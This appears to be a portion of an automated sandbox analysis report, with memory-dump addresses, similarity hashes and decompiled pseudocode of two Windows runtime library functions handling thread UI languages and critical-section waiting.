0x053f277e
0x053f277e
0x053f2781
0x053f2781
0x053f2783
0x053f2784
0x00000000
0x00000000
0x05435bd8
0x05435bde
0x05435be4
0x05435be6
0x05435be8
0x05435be9
0x05435bee
0x05435bf8
0x05435bff
0x05435c01
0x05435c04
0x05435c07
0x05435c0b
0x05435c0d
0x05435c0d
0x05435c15
0x05435c18
0x05435c1b
0x05435c1b
0x05435c1e
0x00000000
0x00000000
0x053f28c3
0x053f28c8
0x053f28d2
0x053f28d4
0x053f28d8
0x053f28db
0x05435c26
0x05435c28
0x05435c2d
0x05435c2d
0x00000000
0x00000000
0x05435c34
0x05435c36
0x05435c49
0x05435c4e
0x05435c54
0x05435c5b
0x05435c5d
0x05435c60
0x053f2788
0x053f2788
0x053f278b
0x053f278e
0x053f278e
0x053f278e
0x053f2791
0x00000000
0x00000000
0x053f2756
0x053f2750
0x00000000
0x053f2794
0x053f2794
0x053f2795
0x053f2798
0x053f2798
0x00000000
0x053f2734
0x053f272c
0x053f2700
0x053f25ef
0x053f25ef
0x053f25ef
0x053f25f2
0x053f25f8
0x00000000
0x00000000
0x053f25fe
0x00000000
0x053f28e6
0x053f28ec
0x053f28ef
0x053f28f5
0x053f28f8
0x053f28f8
0x00000000
0x053f28f8
0x00000000
0x00000000
0x053f2866
0x053f2866
0x053f2876
0x053f2879
0x00000000
0x00000000
0x053f27e0
0x053f27e7
0x053f27e9
0x053f27eb
0x05435afd
0x00000000
0x05435afd
0x00000000
0x00000000
0x053f2633
0x053f2638
0x053f263b
0x053f263c
0x053f263e
0x053f2640
0x053f2642
0x053f2647
0x053f2649
0x053f264e
0x053f2650
0x053f2653
0x053f2659
0x053f26a2
0x053f26a7
0x053f26ac
0x053f26b2
0x05435b11
0x05435b15
0x05435b17
0x00000000
0x053f26b8
0x053f26b8
0x053f26ba
0x053f27a6
0x053f27a6
0x053f27a9
0x053f27ab
0x053f27b9
0x053f27b9
0x053f27be
0x053f27c1
0x053f27c3
0x053f27c5
0x053f27c7
0x05435c74
0x05435c79
0x05435c79
0x053f27c7
0x00000000
0x053f26c0
0x053f26c0
0x053f26c3
0x053f26c6
0x053f26c6
0x053f26c9
0x053f26c9
0x00000000
0x053f26c9
0x053f26ba
0x053f265b
0x053f265b
0x053f265e
0x053f2667
0x053f266d
0x053f2677
0x053f267c
0x053f267f
0x053f2681
0x05435b49
0x05435b4e
0x053f27cd
0x053f27d0
0x053f27d1
0x053f27d2
0x053f27d4
0x053f27dd
0x053f2687
0x053f2687
0x053f268a
0x053f268b
0x053f268e
0x053f268f
0x053f2691
0x053f2696
0x053f2698
0x053f269d
0x053f269f
0x00000000
0x053f269f
0x053f2681
0x00000000
0x00000000
0x053f2846
0x00000000
0x00000000
0x053f2605
0x053f260a
0x053f260c
0x053f2611
0x053f2616
0x053f2619
0x053f2619
0x053f261e
0x00000000
0x053f2624
0x053f2627
0x053f2627
0x00000000
0x00000000
0x05435b1f
0x00000000
0x00000000
0x053f2894
0x053f289b
0x053f289d
0x053f28a1
0x05435b2b
0x05435b2e
0x05435b2e
0x053f28a7
0x053f28a9
0x05435b04
0x05435b09
0x05435b09
0x05435b09
0x00000000
0x00000000
0x05435b35
0x05435b3c
0x053f28fb
0x053f28fb
0x053f26cc
0x053f26cc
0x053f26d0
0x00000000
0x053f26d2
0x053f26d2
0x00000000
0x053f26d2
0x00000000
0x00000000
0x053f25fe
0x053f292d
0x053f2930
0x053f2935
0x053f2937
0x053f293d
0x053f293f
0x053f2946
0x053f294d
0x053f294e
0x053f294f
0x053f295a
0x053f2963
0x053f2969
0x053f296a
0x053f2971
0x053f297b
0x053f2981
0x053f2982
0x053f2983
0x053f2984
0x053f2985
0x053f2986
0x053f2987
0x053f2988
0x053f2989
0x053f298a
0x053f298b
0x053f298c
0x053f298d
0x053f298e
0x053f298f
0x053f2990
0x053f2992
0x053f2997
0x053f29a3
0x053f29a6
0x053f29ab
0x053f29ad
0x053f29b0
0x053f29b2
0x05435c80
0x053f29b8
0x053f29b8
0x053f29bb
0x053f29c0
0x053f29c5
0x053f29c6
0x053f29c6
0x053f29c9
0x053f29cb
0x00000000
0x00000000
0x053f29cd
0x053f29d0
0x053f29d9
0x053f29db
0x053f29dd
0x053f2a7f
0x053f2a84
0x053f2a87
0x053f2a89
0x05435ca1
0x05435ca3
0x00000000
0x053f2a8f
0x053f2a8f
0x00000000
0x053f2a8f
0x00000000
0x053f29e3
0x053f29e3
0x053f29e3
0x00000000
0x053f29e3
0x053f29dd
0x00000000
0x053f29db
0x053f29e6
0x053f29e9
0x053f29eb
0x053f29ed
0x053f29f3
0x053f29f5
0x053f29f8
0x053f29fa
0x053f2a97
0x053f2a9a
0x053f2a9d
0x053f2add
0x00000000
0x053f2a9f
0x053f2aa2
0x053f2aa5
0x053f2aa8
0x053f2aab
0x05435cab
0x05435caf
0x05435cc5
0x05435cda
0x05435cdc
0x05435cdf
0x05435ce5
0x00000000
0x05435ceb
0x05435ced
0x05435cee
0x00000000
0x05435cee
0x05435cb1
0x05435cb4
0x05435cb9
0x05435cbb
0x00000000
0x05435cbd
0x05435cbd
0x00000000
0x05435cbd
0x05435cbb
0x053f2ab1
0x053f2ab1
0x053f2ac4
0x053f2ac6
0x053f2ac6
0x00000000
0x053f2ac6
0x053f2aab
0x00000000
0x053f2a00
0x053f2a09
0x053f2a0e
0x053f2a21
0x053f2a24
0x053f2a35
0x053f2a3a
0x053f2a3d
0x053f2a42
0x053f2a59
0x053f2a59
0x053f2a5c
0x053f2a5f
0x053f2a5f
0x053f29fa
0x053f29f3
0x053f2a64
0x053f2a64
0x053f2a6b
0x053f2a6b
0x053f2a6d
0x053f2a72
0x053f2a72
0x00000000

Strings

PATH, xrefs: 053F2642, 053F2691

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: cc51c1acd753e340603b5cd17a311ce4d99860564ccbdb1e1f2c603a40ae63b4
Instruction ID: d372d818806dd114872a3d915c6b20d8b9321f8900a03998c30d0ba7aaf220bf
Opcode Fuzzy Hash: cc51c1acd753e340603b5cd17a311ce4d99860564ccbdb1e1f2c603a40ae63b4
Instruction Fuzzy Hash: A6C1AF75E14219EBDB24DF99DC81AEEBBB5FF48700F54402AF901EB290E774A905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 053FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E053FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E053DEEF0(0x54b7b60);
					_t134 =  *0x54b7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x54b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x54b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E053D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E053D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05468938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E053CB150();
													}
													_t116 = E05466D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E053D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x54b8638; // 0x0
																	_t122 = L053D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E053D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E053D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L053FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L053D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E053FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E053FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E053FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E053FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E053FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x54b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x54b7b84 = _t75;
						_t73 = E053DEB70(_t134, 0x54b7b60);
						if( *0x54b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E053DFF60( *0x54b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x053ffab0
0x053ffab2
0x053ffab3
0x053ffab4
0x053ffabc
0x053ffac0
0x053ffb14
0x053ffb17
0x053ffac2
0x053ffac8
0x053ffacd
0x053ffad3
0x053ffad3
0x053ffadd
0x053ffb18
0x053ffb1b
0x053ffb1d
0x053ffb1e
0x053ffb1f
0x053ffb20
0x053ffb21
0x053ffb22
0x053ffb23
0x053ffb24
0x053ffb25
0x053ffb26
0x053ffb27
0x053ffb28
0x053ffb29
0x053ffb2a
0x053ffb2b
0x053ffb2c
0x053ffb2d
0x053ffb2e
0x053ffb2f
0x053ffb3a
0x053ffb3b
0x053ffb3e
0x053ffb41
0x053ffb44
0x053ffb47
0x053ffb4a
0x053ffb4d
0x053ffb53
0x0543bdcb
0x0543bdcb
0x053ffb59
0x053ffb5b
0x053ffb5b
0x053ffb5e
0x0543bdd5
0x0543bdd8
0x00000000
0x0543bdda
0x00000000
0x0543bdda
0x053ffb64
0x053ffb64
0x053ffb64
0x053ffb67
0x053ffb6e
0x053ffb70
0x053ffb72
0x00000000
0x053ffb78
0x053ffb7a
0x053ffb7a
0x053ffb7d
0x053ffb80
0x0543bddf
0x0543bde1
0x00000000
0x0543bde3
0x00000000
0x0543bde3
0x053ffb86
0x053ffb86
0x053ffb86
0x053ffb8b
0x053ffb90
0x053ffb92
0x053ffb94
0x053ffb9a
0x053ffb9b
0x053ffba1
0x0543bde8
0x0543bdeb
0x0543bded
0x0543beb5
0x0543beb5
0x0543bebb
0x0543bebd
0x0543bec3
0x0543bed2
0x0543bedd
0x0543bedd
0x0543beed
0x00000000
0x0543bdf3
0x0543bdfe
0x0543be06
0x0543be0b
0x0543be0d
0x0543be0f
0x0543be14
0x0543be19
0x0543be20
0x0543be25
0x0543be27
0x0543be35
0x0543be39
0x0543be46
0x0543be4f
0x0543be54
0x0543be56
0x0543bef8
0x0543bef8
0x00000000
0x0543be5c
0x0543be5c
0x0543be60
0x00000000
0x0543be66
0x0543be66
0x0543be7f
0x0543be84
0x0543be87
0x0543be89
0x0543be8b
0x0543be99
0x0543be9d
0x0543bea0
0x0543beac
0x0543beaf
0x0543beb1
0x0543beb3
0x0543beb3
0x00000000
0x0543bea2
0x0543bea2
0x00000000
0x0543bea2
0x0543be8d
0x0543be8d
0x0543be92
0x00000000
0x0543be92
0x0543be8b
0x0543be60
0x0543be3b
0x0543be3b
0x0543be3e
0x00000000
0x0543be40
0x0543be40
0x0543be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0543be44
0x0543be3e
0x0543be29
0x0543be29
0x00000000
0x0543be29
0x0543be27
0x00000000
0x053ffba7
0x053ffba7
0x053ffbab
0x0543bf02
0x053ffbb1
0x053ffbb1
0x053ffbb8
0x053ffbbd
0x053ffbbd
0x053ffbbf
0x053ffbbf
0x053ffbc5
0x053ffbcb
0x053ffbf8
0x053ffbf8
0x053ffbfa
0x00000000
0x053ffc00
0x053ffc00
0x053ffc03
0x00000000
0x053ffc09
0x053ffc09
0x053ffc0f
0x053ffc15
0x053ffc23
0x053ffc23
0x053ffc25
0x053ffc27
0x053ffc75
0x053ffc7c
0x053ffc84
0x00000000
0x053ffc29
0x053ffc29
0x053ffc2d
0x053ffc30
0x0543bf0f
0x00000000
0x053ffc36
0x053ffc38
0x053ffc3b
0x053ffc41
0x0543bf17
0x0543bf19
0x0543bf48
0x0543bf4b
0x00000000
0x0543bf1b
0x0543bf22
0x0543bf24
0x0543bf26
0x00000000
0x0543bf2c
0x0543bf37
0x0543bf39
0x0543bf3b
0x00000000
0x0543bf41
0x0543bf41
0x0543bf41
0x0543bf41
0x0543bf45
0x00000000
0x0543bf45
0x0543bf3b
0x0543bf26
0x00000000
0x053ffc47
0x053ffc47
0x053ffc49
0x053ffcb2
0x053ffcb4
0x053ffcb6
0x053ffcdc
0x053ffcdc
0x00000000
0x053ffcb8
0x053ffcc3
0x053ffcc5
0x053ffcc7
0x00000000
0x053ffcc9
0x053ffcc9
0x053ffccd
0x00000000
0x053ffccd
0x053ffcc7
0x00000000
0x053ffc4b
0x053ffc4b
0x053ffc4e
0x053ffc4e
0x053ffc51
0x053ffc51
0x053ffc54
0x053ffc5a
0x053ffc5c
0x053ffc5f
0x053ffc61
0x053ffc63
0x053ffc65
0x053ffc67
0x053ffc6e
0x053ffc72
0x053ffc72
0x053ffc72
0x053ffc72
0x053ffc67
0x053ffc61
0x00000000
0x053ffc5a
0x053ffc49
0x053ffc41
0x053ffc30
0x053ffc27
0x053ffc03
0x053ffbcd
0x053ffbd3
0x053ffbd9
0x053ffbdc
0x053ffbde
0x053ffc99
0x053ffc9b
0x053ffc9d
0x053ffcd5
0x053ffcd5
0x053ffc89
0x053ffc89
0x00000000
0x053ffc9f
0x053ffc9f
0x053ffca3
0x00000000
0x053ffca3
0x00000000
0x053ffbe4
0x053ffbe4
0x053ffbe4
0x053ffbe4
0x053ffbe9
0x053ffbf2
0x00000000
0x053ffbf2
0x053ffbde
0x053ffbcb
0x053ffbab
0x053ffc8b
0x053ffc8b
0x053ffc8c
0x053ffb80
0x053ffb72
0x053ffb5e
0x053ffc8d
0x053ffc91
0x053ffadf
0x053ffadf
0x053ffae1
0x053ffae4
0x053ffae7
0x053ffaec
0x053ffaf8
0x053ffb00
0x053ffb07
0x053ffb0f
0x053ffb0f
0x053ffb07
0x00000000
0x053ffaf8
0x053ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0543BE0F

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: efed29707aa7b07c6d76f64111cb73623c79588b1a17077065168b0f44c477fa
Instruction ID: 9fbe366b16b62c2dafbd12adcba2ab59aa2abb403d7ea1804c91dcb08170cea6
Opcode Fuzzy Hash: efed29707aa7b07c6d76f64111cb73623c79588b1a17077065168b0f44c477fa
Instruction Fuzzy Hash: 58A14132B046168BDB25DF68C455BBAB3BAFF48714F04456AEE02CB7A0DB74D801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 053C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E053C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x54b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x54b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E054097C0();
				}
				if( *0x54b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x54b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E053F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E053E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0545FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05409520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E053FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0541DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x54b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x54b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05409980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E054095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E053E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E053E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05447016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0545FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x54b5350;
							if(_t109 != 0x54b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0545FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05455720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x053c2d8a
0x053c2d8a
0x053c2d92
0x053c2d96
0x053c2d9e
0x053c2da0
0x053c2da3
0x053c2da5
0x053c2da8
0x053c2dab
0x053c2db2
0x0541f9aa
0x0541f9ab
0x0541f9ae
0x0541f9ae
0x053c2db8
0x053c2dc2
0x0541f9b9
0x0541f9be
0x0541f9bf
0x0541f9bf
0x053c2dcf
0x0541f9c9
0x053c2dd5
0x053c2dd5
0x053c2dd5
0x053c2dde
0x053c2de1
0x053c2e70
0x053c2e72
0x053c2e72
0x053c2de7
0x053c2deb
0x053c2e7c
0x053c2e83
0x053c2e85
0x053c2e8b
0x053c2e8d
0x053c2e92
0x053c2e92
0x053c2e85
0x053c2df1
0x053c2df7
0x053c2df9
0x053c2df9
0x053c2dfc
0x053c2dff
0x053c2e02
0x00000000
0x053c2e05
0x053c2e0c
0x0541f9d9
0x053c2e12
0x053c2e12
0x053c2e12
0x053c2e1a
0x0541f9e3
0x0541f9e9
0x0541f9f0
0x0541f9f6
0x0541f9f8
0x0541f9f8
0x0541f9f0
0x053c2e23
0x0541fa02
0x0541fa03
0x0541fa05
0x0541fa06
0x00000000
0x053c2e29
0x053c2e29
0x053c2e2e
0x053c2e34
0x053c2e3e
0x00000000
0x00000000
0x053c2e44
0x053c2e47
0x053c2e4d
0x00000000
0x00000000
0x053c2e4f
0x053c2e54
0x00000000
0x00000000
0x053c2e5a
0x053c2e5f
0x053c2e9a
0x053c2ea4
0x053c2ea5
0x053c2ea8
0x053c2eaf
0x053c2eb2
0x053c2eb5
0x0541fae9
0x0541faeb
0x0541faed
0x0541faef
0x0541faf7
0x0541faf8
0x0541fafd
0x0541faff
0x0541fb04
0x0541fb04
0x0541faff
0x053c2ec0
0x053c2ec4
0x053c2ec6
0x053c2ec8
0x0541fb14
0x0541fb18
0x0541fb1e
0x0541fb21
0x0541fb21
0x053c2ece
0x053c2ece
0x053c2ece
0x053c2ed7
0x053c2e61
0x053c2e63
0x0541fa6b
0x0541fa71
0x0541fa76
0x0541fa78
0x0541fa8a
0x0541fa7a
0x0541fa83
0x0541fa83
0x0541fa8f
0x0541fa91
0x0541fa97
0x0541fa9d
0x0541faa4
0x0541faaa
0x0541faaf
0x0541fab1
0x0541fac3
0x0541fab3
0x0541fabc
0x0541fabc
0x0541fac8
0x0541facb
0x0541fadf
0x0541fadf
0x0541facb
0x0541faa4
